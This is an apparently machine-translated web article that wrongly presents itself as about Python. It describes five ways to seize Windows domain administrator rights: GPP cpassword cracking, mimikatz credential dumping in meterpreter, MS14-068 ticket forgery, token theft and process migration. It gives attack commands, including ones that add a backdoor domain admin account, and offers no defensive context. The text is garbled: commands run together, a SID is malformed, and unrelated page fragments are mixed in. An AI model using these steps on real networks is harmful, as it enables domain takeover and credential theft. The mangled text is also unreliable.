In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-06 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)06/01 Report--
This article mainly introduces the ways for Python security to obtain domain administrator rights, which are introduced in great detail and have a certain reference value. Friends who are interested must read it!
In most cases, attackers can obtain domain administrator privileges by locating the server to which the domain administrator is logged in, exploiting vulnerabilities to obtain server system privileges, and finding domain management accounts, processes, or authentication tokens
The first way: take advantage of GPP vulnerability to obtain domain management rights.
SYSVOL is a shared folder within a domain that stores login scripts, group policy scripts, and so on. When a domain administrator changes a password through group policy, introducing a user password into the script can cause security problems.
(1) visit the SYSVOL shared folder, search for the XML file containing "cpassword", and get the password encrypted by AES.
(2) use the gpp-decrypt that comes with kali to crack, so as to obtain the domain account password, and log in to the domain administrator account directly to obtain access rights.
The second way: get the plaintext login password of the server
System permissions are required to use the kiwi module, so we need to upgrade the shell in the current MSF to system before using this module. There are two ways to mention system, one is that the current permissions are administrator users, and the other is to use other means to promote rights to administrator users first. Administrator users can then getsystem directly to system permissions.
Meterpreter > getuidServer username: BYPASS-E97BA3FC\ Administratormeterpreter > getsystem... got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). Meterpreter > getuidServer username: NT AUTHORITY\ SYSTEM
Load kiwi module
Load kiwi
Enumerate the plaintext passwords in the system
Creds_all
The third way: use MS14-068loophole to claim rights.
MS14068 is a privilege escalation vulnerability that enables ordinary users to elevate their rights to domain control privileges. Attackers can elevate privileges by constructing specific request packets.
Attack flow:
The first step: use MS14-068 to forge and generate TGT
MS14-068.exe-u bypass@test.com-p abc123!-s Smur1-5-21-735015318-3972860336-672499796-d dc.test.com
Step 2: use mimikatz to write the TGT ticket obtained by the tool to memory and create a cache certificate
Mimikatz#kerberos::ptc TGT_bypass@test.com.ccache
Step 3: obtain domain administrator privileges. Create a test account and join the domain administrators group, so that you can log in to the domain control host at any time to operate.
PsExec.exe\\ dc cmd.exe / / add test user net user test abc123! / add / domain// add test user to domain administrator group net group "domain admins" test / add / domain// View domain administrator net group "domain admins" / domain 4th way: steal domain administrator token
When a domain control account logs in to the server, you can use token simulation to infiltrate to obtain domain control permissions.
1. Invade the server where the domain administrator is located and steal the domain administrator's token to control the entire domain.
2. Add a domain administrator directly on the meterpreter shell
IP address of add_user test abc123!-h domain control add_group_user "Domain Admins" test-h domain control IP address 5: process migration
Domain administrator privileges can be obtained by hacking into the server where the domain administrator is logged in and migrating the process to the process that the domain administrator is running.
1. Get the list of domain administrators
Net group "Domain Admins" / domain
2. Use ps to find the process that the domain administrator (TEST\ bypass) is running, and then migrate the shell process to the process run by the domain administrator. After success, you will get domain administrator privileges. As shown in the following figure:
3. Enter the shell command to get OS shell, and use the Windows command on the local machine to add a new domain administrator:
/ / add test users net user test admin@123 / add / domain// add test users to the domain administrator group net group "domain admins" test / add / domain
4. The domain administrator account test has been added successfully.
The above is all the contents of the article "what are the ways for Python to secure access to domain administrators?" Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.